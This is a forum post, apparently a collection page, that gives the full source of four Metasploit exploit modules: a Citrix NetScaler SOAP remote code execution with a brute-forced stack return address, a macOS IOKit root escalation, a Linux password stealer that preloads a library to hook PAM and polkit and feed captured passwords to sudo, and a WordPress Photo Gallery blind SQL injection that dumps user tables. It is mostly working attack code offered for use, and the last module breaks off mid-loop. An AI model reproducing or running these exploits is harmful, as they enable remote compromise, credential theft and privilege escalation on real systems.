
Модули для Metasploit Framework

Citrix NetScaler SOAP Handler Remote Code Execution Exploit

This Metasploit module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance. The vulnerability exists in the SOAP handler, accessible through the web interface. A malicious SOAP request can force the handler to connect to a malicious NetScaler config server. This malicious config server can send a specially crafted response in order to trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary code with the privileges of the web server running the SOAP handler. This Metasploit module has been tested successfully on the NetScaler Virtual Appliance 450010.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  # Remote exploit for the NetScaler SOAP handler. The SOAP login request sent
  # by send_request_soap names SRVHOST as the config server, so the handler
  # connects to this module's TcpServer, which answers in on_client_data with
  # the response that overwrites the stack. Brute is mixed in so the return
  # address can be iterated when the target's fixed 'Ret' yields no session.
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Brute

  # Module metadata plus the options the module needs: TARGETURI for the
  # handler path and SRVHOST/SRVPORT for the listener the appliance is told
  # to connect back to.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Citrix NetScaler SOAP Handler Remote Code Execution",
      'Description'    => %q{
        This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
        The vulnerability exists in the SOAP handler, accessible through the web interface. A
        malicious SOAP requests can force the handler to connect to a malicious NetScaler config
        server. This malicious config server can send a specially crafted response in order to
        trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
        code with the privileges of the web server running the SOAP handler. This module has been
        tested successfully on the NetScaler Virtual Appliance 450010.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bradley Austin', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
        ],
      'Payload'        =>
        {
          'Space'          => 1024,
          'MinNops'        => 512,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Arch'           => ARCH_X86,
      'Platform'       => 'bsd',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'NetScaler Virtual Appliance 450010',
            {
              'RwPtr'        => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
              'Offset'       => 606,
              'Ret'          => 0xffffda94, # Try before bruteforce...
              # The virtual appliance lacks of security mitigations like DEP/ASLR, since the
              # process being exploited is an apache child, the bruteforce attack works fine
              # here.
              'Bruteforce'   =>
                {
                  'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
                  'Stop'  => { 'Ret' => 0xfffdf000 }, # top of the stack
                  'Step'  => 256
                }
            }
          ],
        ],
      'DisclosureDate' => "Sep 22 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
        OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),
        OptPort.new('SRVPORT', [true,  "The local port to listen on.", 3010])
      ], self.class)
  end


  # Fingerprint the SOAP handler with a plain GET on TARGETURI.
  #
  # @return [Msf::Exploit::CheckCode] Detected when a 200 response body matches
  #   the handler's "Server Request Handler ... No body received" page,
  #   Unknown otherwise (including when there is no response at all)
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    })

    if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Unknown
  end

  # Rejects SRVHOST values the appliance cannot connect back to, requires
  # check to report Detected, starts the TCP listener and then tries the
  # target's fixed 'Ret' once. Without a session it falls through to the
  # Brute mixin's exploit (super), which presumably walks the 'Bruteforce'
  # range and calls brute_exploit per candidate.
  def exploit
    if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
      fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
    end

    if check != Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
    end

    start_service

    if target.ret
      @curr_ret = target.ret
      send_request_soap
      # Give the appliance time to connect back and run the payload before
      # deciding whether the fixed address worked.
      Rex.sleep(3)

      if session_created?
        return
      end
    end

    super
  end

  # Brute callback: one attempt per candidate address set.
  #
  # @param addrs [Hash] candidate addresses; only 'Ret' is read here
  def brute_exploit(addrs)
    @curr_ret = addrs['Ret']
    send_request_soap
  end

  # POST the SOAP login to the handler. Both clientip and ns are set to
  # SRVHOST, which is what makes the handler open a connection to this
  # module's listener instead of a real config server. The request body
  # carries the hard-coded nsroot/nsroot credentials exactly as shown.
  def send_request_soap
    soap = <<-EOS
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns7744:login xmlns:ns7744="urn:NSConfig">
<username xsi:type="xsd:string">nsroot</username>
<password xsi:type="xsd:string">nsroot</password>
<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
</ns7744:login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
    EOS

    print_status("#{peer} - Sending soap request...")

    # The second argument is the send_request_cgi response timeout in
    # seconds; the HTTP reply itself is not used, the work happens on the
    # TCP listener.
    send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path),
      'data'   => soap
    }, 1)
  end

  # TcpServer callback for the connection the appliance opens to SRVPORT.
  # Reads the client's request (a 2-byte little-endian length, then
  # length-2 bytes expected to start with 0xa5a50000) and replies with the
  # crafted response: 'Offset' filler bytes, the current return address and
  # 'RwPtr' as two little-endian dwords, then the encoded payload, framed by
  # a 2-byte length and the "\x00\x00\xa5\xa5" marker.
  #
  # @param c [Rex::Socket] the accepted client connection
  def on_client_data(c)
    print_status("#{c.peerhost} - Getting request...")

    # NOTE(review): neither get_once result is nil-checked before unpack; a
    # peer that disconnects without sending raises NoMethodError here.
    data = c.get_once(2)
    req_length = data.unpack("v")[0]

    req_data = c.get_once(req_length - 2)
    # A magic mismatch only warns; the response is sent regardless.
    unless req_data.unpack("V")[0] == 0xa5a50000
      print_error("#{c.peerhost} - Incorrect request... sending payload anyway")
    end

    print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")

    my_payload = Rex::Text.pattern_create(target['Offset'])
    my_payload << [@curr_ret, target['RwPtr']].pack("V*")
    my_payload << payload.encoded

    # +6 accounts for the 2-byte length field and the 4-byte marker below.
    pkt = [my_payload.length + 6].pack("v")
    pkt << "\x00\x00\xa5\xa5"
    pkt << my_payload
    c.put(pkt)
    c.disconnect
  end

end
 
Mac OS X IOKit Keyboard Driver Root Privilege Escalation Exploit

A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue has been patched silently in Yosemite.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Local
  # Local privilege escalation wrapper: drops a prebuilt exploit binary
  # shipped with the framework (data/exploits/CVE-2014-4404/key_exploit)
  # and a Mach-O payload into /tmp, marks both executable and runs the
  # exploit with the payload path as its only argument.
  Rank = ManualRanking # Can cause kernel crash

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata; a single "native payload" target, no extra options.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
      'Description'   => %q{
        A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
        corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
        pointers can also be leaked, allowing a full kASLR bypass.

        Tested on Mavericks 10.9.5, and should work on previous versions.

        The issue has been patched silently in Yosemite.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
          'joev' # copy/paste monkey
        ],
      'References'    =>
        [
          [ 'CVE', '2014-4404' ],
          [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
          # Heap overflow:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
          # kALSR defeat:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => ARCH_X86_64,
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))
  end

  # Version-only check: no probing of the driver itself.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when `sw_vers` reports a
  #   product version below 10.10, Safe otherwise
  def check
    if ver_lt(osx_ver, "10.10")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Writes the exploit binary and the payload executable under random names
  # in /tmp, registers both with FileDropper for cleanup, then executes the
  # exploit passing the payload path. All commands are run through the
  # existing session (cmd_exec).
  def exploit
    exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
    binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
    binary_payload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

    print_status("Writing exploit file as '#{exploit_file}'")
    write_file(exploit_file, binary_exploit)
    register_file_for_cleanup(exploit_file)

    print_status("Writing payload file as '#{payload_file}'")
    write_file(payload_file, binary_payload)
    register_file_for_cleanup(payload_file)

    print_status("Executing payload...")
    cmd_exec("chmod +x #{exploit_file}")
    cmd_exec("chmod +x #{payload_file}")
    cmd_exec("#{exploit_file} #{payload_file}")
  end

  # @return [String] the stripped output of `sw_vers -productVersion`
  #   (empty string when the command produced nothing)
  def osx_ver
    cmd_exec("sw_vers -productVersion").to_s.strip
  end

  # Dotted-version comparison via Gem::Version.
  #
  # @param a [String] version string
  # @param b [String] version string
  # @return [Boolean] true when a sorts before b
  # @raise [ArgumentError] when either string is not a valid Gem::Version
  def ver_lt(a, b)
    Gem::Version.new(a) < Gem::Version.new(b)
  end

end
 
 
Desktop Linux Password Stealer / Privilege Escalation Exploit

This Metasploit module steals the user password of an administrative user on a desktop Linux system when it is entered for unlocking the screen or for doing administrative actions using policykit. Then it escalates to root privileges using sudo and the stolen user password. It exploits the design weakness that there is no trusted channel for transferring the password from the keyboard to the actual password verification against the shadow file (which is running as root since /etc/shadow is only readable to the root user). Both screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under the current user account to query for the password and then pass it to a setuid-root binary to do the password verification. Therefore it is possible to inject a password stealer after compromising the user account. Since sudo requires only the user password (and not the root password of the system), stealing the user password of an administrative user directly allows escalating to root privileges. Please note that you have to start a handler as a background job before running this exploit since the exploit will only create a shell when the user actually enters the password (which may be hours after launching the exploit). Using exploit/multi/handler with the option ExitOnSession set to false should do the job.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'base64'
require 'metasm'
 
class Metasploit4 < Msf::Exploit::Local
  # Local module that installs an LD_PRELOAD library (compiled on the fly
  # with Metasm, see c_code) into the user's screensaver / polkit agent
  # processes by killing and re-executing them with the library preloaded.
  # The library hooks pam_start and polkit_agent_session_response and pipes
  # any captured password into `sudo -S <payload>`.
  #
  # Note for cleanup/forensics: FileDropper is not mixed in and nothing is
  # registered for cleanup, so the .elf and .so written to WritableDir stay
  # on the host after the module finishes.
  Rank = ExcellentRanking
  include Msf::Exploit::EXE
  include Msf::Post::File

  # Module metadata. The payload handler is disabled by default because the
  # shell only arrives once the user types a password, possibly hours later.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info={})
    super( update_info( info, {
      'Name'          => 'Desktop Linux Password Stealer and Privilege Escalation',
      'Description'   => %q{
        This module steals the user password of an administrative user on a desktop Linux system
        when it is entered for unlocking the screen or for doing administrative actions using
        policykit. Then it escalates to root privileges using sudo and the stolen user password.
        It exploits the design weakness that there is no trusted channell for transferring the
        password from the keyboard to the actual password verificatition against the shadow file
        (which is running as root since /etc/shadow is only readable to the root user). Both
        screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under
        the current user account to query for the password and then pass it to a setuid-root binary
        to do the password verification. Therefore it is possible to inject a password stealer
        after compromising the user account. Since sudo requires only the user password (and not
        the root password of the system), stealing the user password of an administrative user
        directly allows escalating to root privileges. Please note that you have to start a handler
        as a background job before running this exploit since the exploit will only create a shell
        when the user actually enters the password (which may be hours after launching the exploit).
        Using exploit/multi/handler with the option ExitOnSession set to false should do the job.
      },
      'License'       => MSF_LICENSE,
      'Author'        => ['Jakob Lell'],
      'DisclosureDate' => 'Aug 7 2014',
      'Platform'      => 'linux',
      'Arch'          => [ARCH_X86, ARCH_X86_64],
      'SessionTypes'  => ['shell', 'meterpreter'],
      'Targets'       =>
        [
          ['Linux x86', {'Arch' => ARCH_X86}],
          ['Linux x86_64', {'Arch' => ARCH_X86_64}]
        ],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependFork' => true,
          'DisablePayloadHandler' => true
        },
      'DefaultTarget' => 0,
      }
    ))

    register_options([
      OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp']),
    ], self.class)
  end

  # Runs one shell pipeline on the target that prints "OK" only when perl
  # and sudo exist, `id` mentions the sudo or adm group, and at least one of
  # the screensaver / polkit agent processes is running.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when "OK" appears anywhere
  #   in the output (String#[] substring lookup), Safe otherwise
  def check
    check_command = 'if which perl && '
    check_command << 'which sudo && '
    check_command << 'id|grep -E \'sudo|adm\' && '
    check_command << 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1;'
    check_command << 'then echo OK;'
    check_command << 'fi'

    output = cmd_exec(check_command).gsub("\r", '')

    vprint_status(output)

    if output['OK'] == 'OK'
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Writes the payload ELF and the preload library into WritableDir, then
  # re-executes every matching process with LD_PRELOAD pointing at the
  # library. The file names are random alpha strings chosen by rand_text_alpha.
  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    pl = generate_payload_exe
    if pl.blank?
      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
    end

    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"

    print_status("Writing payload executable to '#{exe_file}'")
    write_file(exe_file, pl)
    cmd_exec("chmod +x #{exe_file}")


    # Metasm CPU chosen from the target arch; cpu stays nil for any other
    # arch value, and what compile_c does with nil is not visible here.
    cpu = nil
    if target['Arch'] == ARCH_X86
      cpu = Metasm::Ia32.new
    elsif target['Arch'] == ARCH_X86_64
      cpu = Metasm::X86_64.new
    end
    lib_data = Metasm::ELF.compile_c(cpu, c_code(exe_file)).encode_string(:lib)
    lib_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.so"

    print_status("Writing lib file to '#{lib_file}'")
    write_file(lib_file,lib_data)

    print_status('Restarting processes (screensaver/policykit)')
    restart_commands = get_restart_commands
    restart_commands.each do |cmd|
      # String#[]= replaces the first occurrence of the placeholder that
      # get_restart_commands embedded in the perl one-liner.
      cmd['LD_PRELOAD_PLACEHOLDER'] = lib_file
      cmd_exec(cmd)
    end
    print_status('The exploit module has finished. However, getting a shell will probably take a while (until the user actually enters the password). Remember to keep a handler running.')
  end

  # Collects, for each running xscreensaver / gnome-screensaver / polkit
  # agent process, its exe path, argv and environment (read from /proc and
  # hex-encoded by a perl one-liner), and builds one perl command per
  # process that: daemonises (fork, setsid, fds to /dev/null), SIGKILLs the
  # original pid, restores the captured environment with LD_PRELOAD set to
  # the literal LD_PRELOAD_PLACEHOLDER, and execs the original exe with the
  # original argv. The caller substitutes the placeholder.
  #
  # @return [Array<String>] restart commands, possibly empty
  def get_restart_commands
    get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
    get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
    get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
    get_cmd_lines << '$/=undef;'
    get_cmd_lines << 'for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\''

    text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
    vprint_status(text_output)

    lines = text_output.split("\n")

    restart_commands = []
    i=0
    # Each record spans four lines (PID, EXE, cmdline, environ), hence the
    # "- 3" bound: i+3 must still be a valid index.
    while i < lines.length - 3
      m = lines[i].match(/^PID:(\d+)/)

      if m
        pid = m[1]
        vprint_status("PID=#{pid}")
        print_status("Found process: " + lines[i+1])

        exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
        vprint_status("exe=#{exe}")

        # argv is NUL-separated in /proc/<pid>/cmdline; decode the hex first.
        cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack('H*').split("\x00")
        vprint_status("CMDLINE=" + cmdline.join(' XXX '))

        # environ stays hex-encoded and is decoded by the perl command itself.
        env = lines[i+3].match(/^environ:(\w+)$/)[1]
        restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();'
        restart_command << 'kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}'
        restart_command << '$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\''

        vprint_status("RESTART: #{restart_command}")
        restart_commands.push(restart_command)
      end

      i+=1
    end

    restart_commands
  end

  # C source for the preload library, compiled by Metasm in exploit.
  # pam_start wraps the caller's pam_conv so my_conv sees every PAM message;
  # when a message text contains "Password", the response the real
  # conversation collected is handed to run_sudo. polkit_agent_session_response
  # is wrapped the same way and always forwards the response. run_sudo writes
  # the captured string to `sudo -S <exe_file>` via popen. The original
  # functions are resolved lazily with dlsym(RTLD_NEXT, ...).
  #
  # @param exe_file [String] path of the payload ELF, interpolated unquoted
  #   into the popen command string
  # @return [String] the C source
  def c_code(exe_file)
    c = %Q|
// A few constants/function definitions/structs copied from header files
#define RTLD_NEXT      ((void *) -1l)
extern uintptr_t dlsym(uintptr_t, char*);
// Define some structs to void so that we can ignore all dependencies from these structs
#define FILE void
#define pam_handle_t void
extern FILE *popen(const char *command, const char *type);
extern int pclose(FILE *stream);
extern int fprintf(FILE *stream, const char *format, ...);
extern char *strstr(const char *haystack, const char *needle);
extern void *malloc(unsigned int size);

struct pam_message {
  int msg_style;
  const char *msg;
 };

struct pam_response {
  char *resp;
  int resp_retcode;
};

struct pam_conv {
  int (*conv)(int num_msg, const struct pam_message **msg,
  struct pam_response **resp, void *appdata_ptr);
  void *appdata_ptr;
};

void run_sudo(char* password) {
  FILE* sudo = popen("sudo -S #{exe_file}", "w");
  fprintf(sudo,"%s\\n",password);
  pclose(sudo);
}

int my_conv(int num_msg, const struct pam_message **msg, struct pam_response **resp, void *appdata_ptr) {
  struct pam_conv *orig_pam_conversation = (struct pam_conv *)appdata_ptr;
  int i;
  int passwd_index = -1;
  for(i=0;i<num_msg;i++){
    if(strstr(msg[i]->msg,"Password") >= 0){
      passwd_index = i;
    }
  }
  int result = orig_pam_conversation->conv(num_msg, msg, resp, orig_pam_conversation->appdata_ptr);
  if(passwd_index >= 0){
    run_sudo(resp[passwd_index]->resp);
  }
  return result;
}

int pam_start(const char *service_name, const char *user, const struct pam_conv *pam_conversation, pam_handle_t **pamh) __attribute__((export)) {
  static int (*orig_pam_start)(const char *service_name, const char *user, const struct pam_conv *pam_conversation, pam_handle_t **pamh);
  if(!orig_pam_start){
    orig_pam_start = dlsym(RTLD_NEXT,"pam_start");
  }
  struct pam_conv *my_pam_conversation = malloc(sizeof(struct pam_conv));
  my_pam_conversation->conv = &my_conv;
  my_pam_conversation->appdata_ptr = (struct pam_conv *)pam_conversation;
  return orig_pam_start(service_name, user, my_pam_conversation, pamh);
}

void polkit_agent_session_response (void *session, char *response) __attribute__((export)) {
  static void *(*orig_polkit_agent_session_response)(void *session, char* response);
  if(!orig_polkit_agent_session_response){
    orig_polkit_agent_session_response = dlsym(RTLD_NEXT,"polkit_agent_session_response");
  }
  run_sudo(response);
  orig_polkit_agent_session_response(session, response);
  return;
}
|
    c
  end
end
 
Wordpress Photo Gallery Unauthenticated SQL Injection User Enumeration Exploit

This Metasploit module exploits an unauthenticated SQL injection in order to enumerate the Wordpress users tables, including password hashes. This Metasploit module was tested against version 1.2.7.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
 
require 'msf/core'
 
class Metasploit4 < Msf::Auxiliary
  # Boolean-blind SQL injection through the order_by parameter of the
  # plugin's GalleryBox admin-ajax action. Every probe is a GET to
  # wp-admin/admin-ajax.php; a "true" condition is recognised solely by the
  # response body having the same length as an uninjected baseline request.
  #
  # Detection note: each enumerated character costs one request, so a run
  # produces a long burst of admin-ajax.php GETs with an order_by value
  # containing INFORMATION_SCHEMA and CASE WHEN expressions.

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options: GALLERYID (optional, default nil) and
  # TARGETURI (WordPress root).
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Wordpress Photo Gallery Unauthenticated SQL Injection User Enumeration",
      'Description'    => %q{
      This module exploits an unauthenticated SQL injection in order to enumerate the Wordpress
      users tables, including password hashes. This module was tested against version 1.2.7.
      },
      'License'        => 'ExploitHub',
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
        ],
      'References'     =>
        [
          ['CVE', '2014-2238'],
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 28 2014"))

      register_options(
      [
        OptInt.new('GALLERYID', [false, 'Gallery ID to use. If not provided, the module will attempt to bruteforce one.', nil]),
        OptString.new('TARGETURI', [ true, 'Relative URI of Wordpress installation', '/'])
      ], self.class)
  end

  # Baseline query-string parameters for the GalleryBox action. Callers
  # overwrite 'gallery_id', and send_injected_request appends the injection
  # to 'order_by'.
  #
  # @return [Hash{String => Object}] a fresh hash on every call
  def get_params
    {
      'tag_id' => 0,
      'action' => 'GalleryBox',
      'current_view' => 0,
      'image_id' => 1,
      'gallery_id' => 1,
      'theme_id' => 1,
      'thumb_width' => 180,
      'thumb_height' => 90,
      'open_with_fullscreen' => 0,
      'open_with_autoplay' => 0,
      'image_width' => 800,
      'image_height' => 500,
      'image_effect' => 'fade',
      'sort_by' => 'order',
      'order_by' => 'asc',
      'enable_image_filmstrip' => 1,
      'image_filmstrip_height' => 70,
      'enable_image_ctrl_btn' => 1,
      'enable_image_fullscreen' => 1,
      'popup_enable_info' => 1,
      'popup_info_always_show' => 0,
      'popup_info_full_width' => 0,
      'popup_hit_counter' => 0,
      'popup_enable_rate' => 0,
      'slideshow_interval' => 5,
      'enable_comment_social' => 1,
      'enable_image_facebook' => 1,
      'enable_image_twitter' => 1,
      'enable_image_google' => 1,
      'enable_image_pinterest' => 0,
      'enable_image_tumblr' => 0,
      'watermark_type' => 'none',
      'current_url' => ''
    }
  end

  # Tries gallery IDs 1..666 and returns the first one whose response body
  # contains the `data["0"] = [];` marker.
  #
  # @return [Integer] the first matching gallery ID
  # @raise [Msf::Exploit::Failed] via fail_with when none of the 666 IDs match
  def bruteforce_gallery_id
    1.upto(666) do |i|
      get_vars = get_params
      get_vars['gallery_id'] = i
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
        'vars_get' => get_vars
      })

      return i if res and res.body =~ /data\["0"\] = \[\];/
    end

    fail_with(Failure::Unknown, "Couldn't bruteforce a gallery ID, please explicitly supply a known good gallery ID")
  end

  # Main flow: pick a gallery ID, take a baseline response length, then walk
  # schema count -> schema names -> per-schema table count -> table names ->
  # (for tables ending in "users") row count and per-column lengths. As
  # listed here the final loop only reports column lengths; no column values
  # are retrieved after it.
  def run
    gallery_id = datastore['GALLERYID']

    # NOTE(review): the GALLERYID option defaults to nil (register_options),
    # so this branch is taken only when the user sets 0 explicitly; with no
    # value set, gallery_id stays nil for the rest of the run.
    if gallery_id == 0
      print_status('No GALLERYID supplied, attempting bruteforce.')
      gallery_id = bruteforce_gallery_id
      print_status("Found a gallery with an ID of #{gallery_id}")
    end

    parms = get_params
    parms['gallery_id'] = gallery_id

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' => parms
    })

    # Baseline: the body length of an uninjected request. Every comparison
    # below treats "same length" as the condition being true. res and
    # res.body are not nil-checked here or in the loops below.
    real_length = res.body.length

    # Number of schemas: first i for which COUNT(DISTINCT schema_name) <= i.
    count = nil
    1.upto(999) do |i|
      payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(DISTINCT(schema_name)),0x20) FROM INFORMATION_SCHEMA.SCHEMATA) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 3181*(SELECT 3181 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

      res = send_injected_request(payload, gallery_id)

      count = i if res.body.length == real_length
      break if count
    end

    print_status("Looks like there are #{count} databases.")

    # Schema names: length first, then one character per position, scanning
    # printable ASCII from 126 down to 32 (the match is reported as c+1).
    # count is used unguarded, so a nil count raises on the next line.
    schemas = []
    0.upto(count-1) do |i|
      length = nil

      1.upto(999) do |c|
        payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(schema_name),0x20) FROM (SELECT DISTINCT(schema_name) "
        payload << "FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS pxqq) BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 6586*"
        payload << "(SELECT 6586 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

        res = send_injected_request(payload, gallery_id)

        length = c if res.body.length == real_length
        break if !length.nil?
      end

      print_status("Schema #{i}'s name has a length of #{length}. Getting name.")

      name = ''
      1.upto(length) do |l|
        126.downto(32) do |c|
          payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(schema_name AS CHAR),0x20) FROM (SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS lela),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7601*(SELECT 7601 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

          res = send_injected_request(payload, gallery_id)

          vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length
          name << (c+1).chr if res.body.length == real_length
          break if res.body.length == real_length
        end
      end
      schemas << name
      print_status("Found database #{name}")
    end

    # System schemas are skipped; only application schemas are walked.
    schemas.delete('mysql')
    schemas.delete('performance_schema')
    schemas.delete('information_schema')

    schemas.each do |schema|
      # Table count per schema; the schema name is passed hex-encoded.
      num_tables = nil
      1.upto(999) do |i|
        payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]}) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 8846*(SELECT 8846 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

        res = send_injected_request(payload, gallery_id)

        num_tables = i if res.body.length == real_length
        break if num_tables
      end

      print_status("Schema #{schema} has #{num_tables} tables. Enumerating.")

      # Table names (length capped at 64 here), keeping only those that end
      # in "users".
      tables = []
      0.upto(num_tables - 1) do |t|
        length = nil
        0.upto(64) do |l|
          payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1) BETWEEN 0 AND #{l}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

          res = send_injected_request(payload, gallery_id)

          length = l if res.body.length == real_length
          break if length
        end

        print_status("Table #{t}'s name has a length of #{length}")

        name = ''
        1.upto(length) do |l|
          126.downto(32) do |c|
